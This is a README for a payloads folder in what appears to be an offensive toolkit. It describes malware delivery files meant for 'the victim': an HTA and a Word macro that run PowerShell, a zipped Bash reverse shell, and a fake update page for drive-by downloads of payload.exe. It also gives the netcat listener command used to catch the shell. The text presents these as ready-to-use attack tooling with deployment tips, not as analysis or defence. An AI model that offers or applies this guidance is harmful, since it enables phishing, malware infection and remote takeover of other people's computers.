ekomsSavior/Jam_fi/payloads/payloads_README.md

 - **`payload.hta`** –  A Windows HTML application that auto-executes a PowerShell payload when opened.
 Ideal for older Windows versions and Internet Explorer.
 Make sure your `payload.exe` is reachable at the link hardcoded in the file.

-- **`reverse_shell.zip`** –  A zipped Bash reverse shell.
-When the victim extracts and runs it, it connects back to your terminal.
-You must run `sudo nc -lvnp 4444` before the victim opens it to catch the shell.

 - **`autostart.html`** –  A fake update page that redirects to download `payload.exe` immediately when loaded.
 Simple, quick, and effective for drive-by-style delivery.

 - **`macro.vba`** –  A Word macro script that executes a PowerShell command when a `.docm` file is opened.
 You don’t need to modify this — just understand that it must be embedded in a Word doc manually for full execution.